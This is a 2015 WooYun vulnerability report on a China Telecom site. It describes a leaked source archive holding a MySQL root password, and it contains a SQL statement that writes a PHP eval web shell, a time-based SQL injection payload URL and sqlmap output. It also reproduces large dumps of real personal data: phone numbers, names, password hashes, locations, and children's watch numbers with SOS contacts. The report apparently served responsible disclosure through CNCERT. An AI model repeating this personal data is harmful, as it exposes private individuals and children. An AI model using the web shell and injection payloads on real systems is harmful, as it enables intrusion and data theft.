当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158329

漏洞标题:中国电信某站源码泄露+数据库root弱口令+大量用户数据信息泄露+getshell(5千份儿童机+SOS号码+大量用户数据)

相关厂商:中国电信某站

漏洞作者: 0x 80

提交时间:2015-12-04 20:30

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

中国电信某站源码泄露+数据库root弱口令+大量用户数据信息泄露+getshell(5千份儿童机+SOS号码+大量用户数据)

详细说明:

http://**.**.**.**/web.rar
得到源码,发现ROOT密码

}
//GET Paramater Check
function get_check($p)
{
	if(!get_magic_quotes_gpc())
	{
		$p=addslashes($p);
	}
	$p=str_replace("_","\_",$p);
	$p=str_replace("%","\%",$p);
	return $p;
}
//POST Paramater Check
function sql_check($p)
{
	//new add
	$p=str_replace("'","",$p);
	$p=mysql_real_escape_string($p);
	//old
	if(!get_magic_quotes_gpc())
	{
		$p=addslashes($p);
	}
	$p=str_replace("_","\_",$p);
	$p=str_replace("%","\%",$p);
	$p=nl2br($p);
	$p=htmlspecialchars($p);
	return $p;
}
//-----------------------------------------------------------------------------
$DBLink=mysql_connect('**.**.**.**','root','dh`123') or die($error[0]);
mysql_select_db("tyga",$DBLink);
?>


果断连接

159	18937602299	18	e10adc3949ba59abbe56e057f20f883e	河南罗总	2015-6-4 16:00:06	32.158638	114.093521	16
256	13088985010	25	e10adc3949ba59abbe56e057f20f883e	董小军	2015-6-10 16:46:45	0.000000	0.000000	11
257	18182580358	25	e10adc3949ba59abbe56e057f20f883e	WF	2015-6-18 16:20:23	0.000000	0.000000	11
258	18905006188	25	e10adc3949ba59abbe56e057f20f883e	王凡测试	2015-6-19 14:53:56	26.117235	119.326782	12
264	18047182815	23	6f50a800733784543b925ec681a402b2	高钰涵	2015-6-25 10:28:51	0.000000	0.000000	11
265	18047182569	23	0cdbec7f5f86a2183c75e9951fa8b1e5	王雪菲	2015-6-25 10:28:52	0.000000	0.000000	11
266	18047182844	23	e204bc32107eee8cab74d68515a5e41f	孟子龙	2015-6-25 10:28:53	0.000000	0.000000	11
267	18047182813	23	cf789c9f902ef5e3072da66868dbeffc	谷岳霖	2015-6-25 10:28:53	0.000000	0.000000	11
268	18047182578	23	a2a64265721427605ec182827171265b	吕菁	2015-6-25 10:28:54	0.000000	0.000000	11
269	18047182801	23	781ab01d91dbb17793ee8fb04af80ff5	李振华	2015-6-25 10:28:55	0.000000	0.000000	11
270	18047182825	23	91c0057de627ca433448d0f5a6824b4f	高子尧	2015-6-25 10:28:56	0.000000	0.000000	11
271	18047182846	23	cb56d9a767cab2d4916253a2074b9f95	李少晗	2015-6-25 10:28:57	0.000000	0.000000	11
272	18047182623	23	0c8f16f8552cd004628ec68dd0c0e090	张子豪	2015-6-25 10:28:58	0.000000	0.000000	11
273	18047182818	23	d06363c36485decb41cf00304b221813	张恒	2015-6-25 10:28:59	0.000000	0.000000	11
274	18047182820	23	fc0b0f0c2333da6f05b25cb863bf63f7	戴子轩	2015-6-25 10:29:00	0.000000	0.000000	11
275	18047182824	23	5650e3d1f3a77a25eb89cc8525ca3964	王泽润	2015-6-25 10:29:01	0.000000	0.000000	11
276	18047182821	23	bd647f07253bfa8dd419dccafedf128b	蔺鑫	2015-6-25 10:29:02	0.000000	0.000000	11
277	18047182823	23	303f3f9b6dfa59367cf07d45c8946439	魏子言	2015-6-25 10:29:03	0.000000	0.000000	11
278	18047182845	23	1725e9d919cd3fddc37c06955d0d7f85	李斯羽	2015-6-25 10:29:04	0.000000	0.000000	11
279	18047182800	23	2db63374a84a0609cd3347b8b71dda29	齐思宇	2015-6-25 10:29:05	0.000000	0.000000	11
280	18047182835	23	bbf5c2ef24ef06c6f3384e55917b5194	薛立玮	2015-6-25 10:29:06	0.000000	0.000000	11
281	18047182622	23	d41dfacb100578cd483d3b3145108574	刘正阳	2015-6-25 10:29:08	0.000000	0.000000	11
282	18047168378	23	a9e1ae5e8d494ab20c407d66947de273	马殿恩	2015-6-25 10:29:08	0.000000	0.000000	11
283	18047182812	23	173fee8167a6c1e538976093eaa72511	任怀宇	2015-6-25 10:29:09	0.000000	0.000000	11
284	18047182568	23	ed8b00d9c766c03570a1a0a7e4d52c3d	张权	2015-6-25 10:29:10	0.000000	0.000000	11
285	18047182834	23	35411dddf9c5d59f70dea280930574e1	赵晶晶	2015-6-25 10:29:11	0.000000	0.000000	11
286	18047182811	23	2cdfdf57eb5bf480f95995934d6f2906	刘阳	2015-6-25 10:29:13	0.000000	0.000000	11
287	13304719474	23	d5a4a6f286301df5ba1a19a2f310b151	马薏然	2015-6-25 10:29:14	0.000000	0.000000	11
288	18047182836	23	6fd4b3c75b94cebdd7f9740f9f0834dc	柴晨瑛	2015-6-25 10:29:15	0.000000	0.000000	11
289	18047182831	23	68a650835dc8133ea719ee5ecf3b622a	刘年昶	2015-6-25 10:29:15	0.000000	0.000000	11
292	18047182804	23	ab523dafa203dc5382c458aad0c08d0c	鲁佳彤	2015-6-25 10:29:18	0.000000	0.000000	11
293	18047182843	23	b8d6a657624b449a5a60d187793faf1e	刘晓雪	2015-6-25 10:29:19	0.000000	0.000000	11
294	18047182814	23	b7efc6d0d88fcd33e1f09eee4308842d	关哲坤	2015-6-25 10:29:20	0.000000	0.000000	11
295	18047182582	23	1c5cecea4ffd3111f71878448ce8d8fc	田育博	2015-6-25 10:29:21	0.000000	0.000000	11
296	18047182839	23	954c02549e9702ff19760ad15fddb968	杨宇熙	2015-6-25 10:29:23	0.000000	0.000000	11
297	18947928882	23	862caeba06e8ecdc8d8388334ab30de9	杨一祎	2015-6-25 10:29:24	0.000000	0.000000	11
298	18047182816	23	dde5b94ed22096eb384a741d644d427f	段鹏	2015-6-25 10:29:25	0.000000	0.000000	11
299	18047182802	23	f1cab1954b1fc4ff1914fc819d30f3c1	吴桐	2015-6-25 10:29:26	0.000000	0.000000	11
300	18047182577	23	854f9c56ec74ac40c9275ef89924b65e	樊铠鸣	2015-6-25 10:29:27	0.000000	0.000000	11
301	18047182826	23	6da21e4c6d7ac1ed2eb8ff72de8f6198	许津珠	2015-6-25 10:29:28	0.000000	0.000000	11
302	18047182630	23	c134918a102c69148a53b7a48cf5df9a	崔博雅	2015-6-25 10:29:29	0.000000	0.000000	11
303	18047182832	23	8ac073b9825a37b28d6e06eb79e75a03	张佳楠	2015-6-25 10:29:30	0.000000	0.000000	11
304	18047182807	23	045d8be31a9ad42bb05a8f4c43a53b2e	程宇良	2015-6-25 10:29:31	0.000000	0.000000	11
305	18047182837	23	89a2f66f05e9619e012525a461189da1	李宁格	2015-6-25 10:29:32	0.000000	0.000000	11
306	18047182806	23	1aaac2b9b3b1f8e457f75060cc71c5b9	张笑	2015-6-25 10:29:33	0.000000	0.000000	11
307	18047182809	23	580d45081cdd3ea8b3a74fa934550c44	杨天宇	2015-6-25 10:29:55	0.000000	0.000000	11
308	18047182808	23	6527792ffe69fa06c09644123834426b	吴鹏海	2015-6-25 10:29:58	0.000000	0.000000	11
309	15326035626	23	7cb2622a71da5dfc25981666b1190541	陈达来	2015-6-25 10:30:02	0.000000	0.000000	11
310	15384715448	23	57f737c7a68f88d6dcd86be88147ac40	王佳宣	2015-6-25 10:30:03	0.000000	0.000000	11


由于密码太多,就不一一列举了

1	admin	0	f3abb86bd34cf4d52698f14c0da1dc60	admin	2015-6-8 08:55:10
18	henan	1	e10adc3949ba59abbe56e057f20f883e	ºÓÄÏÇøÓò	2015-6-4 15:58:01
21	ÄÚÃÉÇøÓò	1	e10adc3949ba59abbe56e057f20f883e	ÄÚÃÉÇøÓò	2015-6-8 09:11:30
23	shqdx	21	e10adc3949ba59abbe56e057f20f883e	Èüº±ÇøµçÐÅ	2015-6-8 09:14:15
25	test	1	e10adc3949ba59abbe56e057f20f883e	test	2015-6-8 14:08:48
26	btdx	21	e10adc3949ba59abbe56e057f20f883e	 °üÍ·µçÐÅ	2015-9-22 17:14:10
27	ÔÀÑô	1	e10adc3949ba59abbe56e057f20f883e	ÔÀÑô	2015-10-10 09:57:08
28	ÁèÔÆ	1	e10adc3949ba59abbe56e057f20f883e	ÁèÔÆ	2015-11-10 10:01:27
29	å±ÇÅ·Ö²¿	28	5801c4690defb35f024b9d53b3d9b5c1	å±ÇÅ·Ö²¿	2015-11-10 12:07:11
30	ÖÜÖÁ·Ö²¿	28	9a2e171eca311a5d1875b0a7b2bd6283	ÖÜÖÁ·Ö²¿	2015-11-18 09:01:16


破解后,admin zzz
进入后台
**.**.**.**/admin/login.php?url=%2Fadmin%2F

15353050225 	龙艳娥 	bjfengxian 	2015-12-04 11:41:05 	【1】 			[修改账户的密码。] 	0 		[销户]
	2 	18091719797 	杨涛 	bjxy 	2015-12-03 15:29:14 	【1】 			[修改账户的密码。] 	0 		[销户]
	3 	18691713666 	李巍 	bjxy 	2015-12-03 15:27:34 	【1】 			[修改账户的密码。] 	0 		[销户]
	4 	18609277123 	艾绍远 	bjxy 	2015-12-03 15:26:04 	【1】 			[修改账户的密码。] 	0 		[销户]
	5 	18049171838 	李春妮 	bjfx 	2015-12-03 14:13:54 	【1】 			[修改账户的密码。] 	0 		[销户]
	6 	18509175230 	11 	bjqy 	2015-12-03 11:57:18 	【1】 			[修改账户的密码。] 	0 		[销户]
	7 	13992766000 	董荣华 	bjxy 	2015-12-03 09:52:37 	【1】 			[修改账户的密码。] 	0 		[销户]
	8 	13088902628 	杨洋 	bjxy 	2015-12-03 09:52:15 	【1】 			[修改账户的密码。] 	0 		[销户]
	9 	13379177862 	严忠田 	bjfx 	2015-12-03 08:19:24 	【1】 			[修改账户的密码。] 	0 		[销户]
	10 	18991716388 	任运平 	bjxy 	2015-12-01 17:42:23 	【1】 			[修改账户的密码。] 	0 		[销户]
	11 	13088949800 	李彩霞 	bjxy 	2015-12-01 17:32:50 	【1】 			[修改账户的密码。] 	0 		[销户]
	12 	13992765476 	孙宇 	bjxy 	2015-12-01 17:32:31 	【1】 			[修改账户的密码。] 	0 		[销户]
	13 	18392765880 	白露 	bjxy 	2015-12-01 17:32:14 	【1】 			[修改账户的密码。] 	0 		[销户]
	14 	18109172301 	郑雪会 	bjxy 	2015-12-01 17:31:57 	【1】 			[修改账户的密码。] 	0 		[销户]
	15 	15091710108 	王晓卉 	bjxy 	2015-12-01 17:31:41 	【1】 			[修改账户的密码。] 	0 		[销户]
	16 	15309179365 	郭红军 	bjxy 	2015-12-01 17:31:26 	【1】 			[修改账户的密码。] 	0 		[销户]
	17 	13759739878 	杨彬 	bjxy 	2015-12-01 17:31:12 	【1】 			[修改账户的密码。] 	0 		[销户]
	18 	13772675356 	许勇锋 	bjxy 	2015-12-01 17:30:53 	【1】 			[修改账户的密码。] 	0 		[销户]
	19 	18992780123 	郑志祥 	bjxy 	2015-12-01 17:30:37 	【1】 			[修改账户的密码。] 	0 		[销户]
	20 	13992761750 	陈伟 	bjxy 	2015-12-01 17:30:20 	【1】 			[修改账户的密码。] 	0 		[销户]
	21 	18991757785 	王海萍 	bjxy 	2015-12-01 17:30:02 	【1】 			[修改账户的密码。] 	0 		[销户]
	22 	13892450121 	叶辉 	bjxy 	2015-12-01 17:29:46 	【1】 			[修改账户的密码。] 	0 		[销户]
	23 	13909173193 	张辉 	bjxy 	2015-12-01 17:29:31 	【1】 			[修改账户的密码。] 	0 		[销户]
	24 	15309173093 	姜城堡测试 	bjdx 	2015-11-27 17:12:54 	【1】 			[修改账户的密码。] 	0 		[销户]
	25 	13571188935 	辛力红 	bjxy 	2015-11-27 15:42:20 	【1】 			[修改账户的密码。] 	0 		[销户]


**.**.**.**:100/test.php 路径暴露写入
select '<?php @eval($_POST[c])>'INTO OUTFILE 'D:\ylsx100\3DES_CLASS.php';
**.**.**.**:100/admin/login.php admin 123456
注入一处
**.**.**.**:100/get.php?nu=%27%2b(SELECT+1+FROM+(SELECT+SLEEP(25))A)%2b%27

web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[17:01:14] [INFO] fetching current database
[17:01:14] [WARNING] running in a single-thread mode. Ple
ption '--threads' for faster data retrieval
[17:01:14] [INFO] retrieved: order
current database:    'order'


儿童机

编号	儿童机号码	儿童机名称	开设时间	所属账号	所在地区	KEY1	KEY2	KEY3	KEY4	SOS号码
1	18049574700	74700	2015-12-4 14:54	18049574700	gxyz	18629242878	15309262109	15309262108	18629511595	18629242878
2	18991758664	58664	2015-12-4 11:41	15353050225	bjfengxian	15353050225	15389333366	17734605460		15353050225
3	13325377754	77754	2015-12-3 15:35	18091719797	bjxy	18091719797				18091719797
4	18992714721	14721	2015-12-3 15:35	18609277123	bjxy	18609277123				18609277123
5	13359174359	74359	2015-12-3 15:29	18691713666	bjxy	18691713666				18691713666
6	18049171838	71838	2015-12-3 14:14	18049171838	bjfx	13991748758	13571796818	7218033	13571162087	13991748758
7	18992772856	72856	2015-12-3 11:58	18509175230	bjqy	18509175230	18009173889	13991718512	18613209007	18509175230
8	18191483241	83241	2015-12-3 9:54	13992766000	bjxy	13992766000				13992766000
9	18191482645	82645	2015-12-3 9:54	13088902628	bjxy	13088902628				13088902628
10	18049170560	70560	2015-12-3 8:19	13379177862	bjfx	18291779498	13892491639	18092565398	13567428163	15309178933
11	15353342575	42575	2015-12-1 18:07	13088949800	bjxy	13088949800				13088949800
12	13347462486	62486	2015-12-1 18:07	13992765476	bjxy	13992765476				13992765476
13	18992772410	72410	2015-12-1 18:06	18991757785	bjxy	18991757785				18991757785
14	13379488515	88515	2015-12-1 18:06	18392765880	bjxy	18392765880				18392765880
15	18991745617	45617	2015-12-1 18:06	13892450121	bjxy	13892450121				13892450121
16	18991746156	46156	2015-12-1 18:05	13909173193	bjxy	13909173193				13909173193
17	18992772467	72467	2015-12-1 17:42	18991716388	bjxy	18991716388				18991716388
18	15353342870	42870	2015-12-1 17:40	18109172301	bjxy	18109172301				18109172301
19	13369204015	4015	2015-12-1 17:39	15091710108	bjxy	15091710108				15091710108
20	15353342653	42653	2015-12-1 17:39	15309179365	bjxy	15309179365				15309179365
21	18992743871	43871	2015-12-1 17:39	13759739878	bjxy	13759739878				13759739878
22	13347460905	60905	2015-12-1 17:38	13992761750	bjxy	13992761750				13992761750
23	15353005460	5460	2015-12-1 17:38	18992780123	bjxy	18992780123				18992780123
24	15384578752	78752	2015-12-1 17:37	13772675356	bjxy	13772675356	15009276638	15592528771	15609172596	13772675356
25	18909173066	73066	2015-11-27 17:13	15309173093	bjdx	15309173093	18909175598	18966934909	15309178051	15309173093
26	15309179673	79673	2015-11-27 16:43	13809173322	bjxy	13369207030	18991706663	13809173322	13709276273	13809173322
27	15399210607	10607	2015-11-27 15:42	13571188935	bjxy	18909171508	13571188935	18291806341	3126499;~	13571188935
28	13325379342	79342	2015-11-27 13:58	18690023004	bjxy	18690023004				18690023004
29	13325379146	79146	2015-11-27 13:58	13891709607	bjxy	13891709607	13892415329	8899089	13619274425	13891709607
30	13335475041	75041	2015-11-27 13:58	13772703980	bjxy	13772703980	13772703982	13759795723	13759795729	13772703980
31	13325377940	77940	2015-11-27 13:57	13892772589	bjxy	13892772589				13892772589
32	13325375402	75402	2015-11-27 13:57	18891788669	bjxy	18891788669	13892782770	15291702798	15291702352	13892782770
33	13335474647	TONG	2015-11-27 13:57	13619270166	bjxy	13619270166	15991970840	13891792641		13619270166
34	13335469842	69842	2015-11-27 13:57	18909170993	bjxy	18909170993	18909170279	18091690008	13309170805	18909170993
35	18191484874	84874	2015-11-27 13:56	13891737690	bjxy	13891737690				13891737690
36	18191483764	83764	2015-11-27 13:56	15877603288	bjxy	15877603288	13891780696			15877603288
37	18191484751	84751	2015-11-27 13:56	13809170103	bjxy	13809170103				13809170103
38	18191481224	81224	2015-11-27 13:54	13509173278	bjxy	13509173278				13509173278
39	18191482949	82949	2015-11-26 15:32	13772642200	bjxy	13772642200				13772642200
40	18191481431	81431	2015-11-26 15:31	13369200270	bjxy	13369200270				13369200270
41	18191481954	81954	2015-11-26 15:30	13891712526	bjxy	13891712526				13891712526
42	18191482443	82443	2015-11-25 19:55	13991726350	bjxy	13991726350				13991726350
43	18191484946	84946	2015-11-25 19:55	17719623090	bjxy	17719623090				17719623090
44	18191481241	81241	2015-11-25 19:55	13098155777	bjxy	13098155777				13098155777
45	18191484823	84823	2015-11-25 19:54	15877693369	bjxy	15877693369				15877693369
46	18191484671	84671	2015-11-25 19:54	13571731529	bjxy	13571731529				13571731529
47	18191483364	83364	2015-11-25 19:54	18690009855	bjxy	18690009855				18690009855
48	18191484802	84802	2015-11-25 19:54	13008477528	bjxy	13008477528				13008477528
49	18191483418	83418	2015-11-25 19:53	13259170300	bjxy	13259170300				13259170300
50	18191483648	83648	2015-11-25 19:52	13092931098	bjxy	13092931098				13092931098
51	18191485154	85154	2015-11-25 19:46	18049381650	bjxy	18049381650				18049381650
52	18191483314	83314	2015-11-25 19:46	15829494670	bjxy	15829494670				15829494670
53	18191484249	84249	2015-11-25 19:44	13571171230	bjxy	13571171230				13571171230
54	18191484149	84149	2015-11-25 19:44	13991751537	bjxy	13991751537				13991751537
55	18191484197	84197	2015-11-25 19:43	13992782033	bjxy	13992782033				13992782033
56	18191481349	81349	2015-11-25 19:43	18991707777	bjxy					18991707777
57	18191484841	84841	2015-11-25 19:43	15829508158	bjxy	15829508158				15829508158
58	18191484453	84453	2015-11-25 19:37	13909171740	bjxy	13909171740				13909171740


由于上传图片,卡了,只能这样列出
**.**.**.**/admin/terminal_excel.php?id=1 儿童机数据

漏洞证明:

http://**.**.**.**/web.rar

修复方案:

好好整改,问题多

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-08 12:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无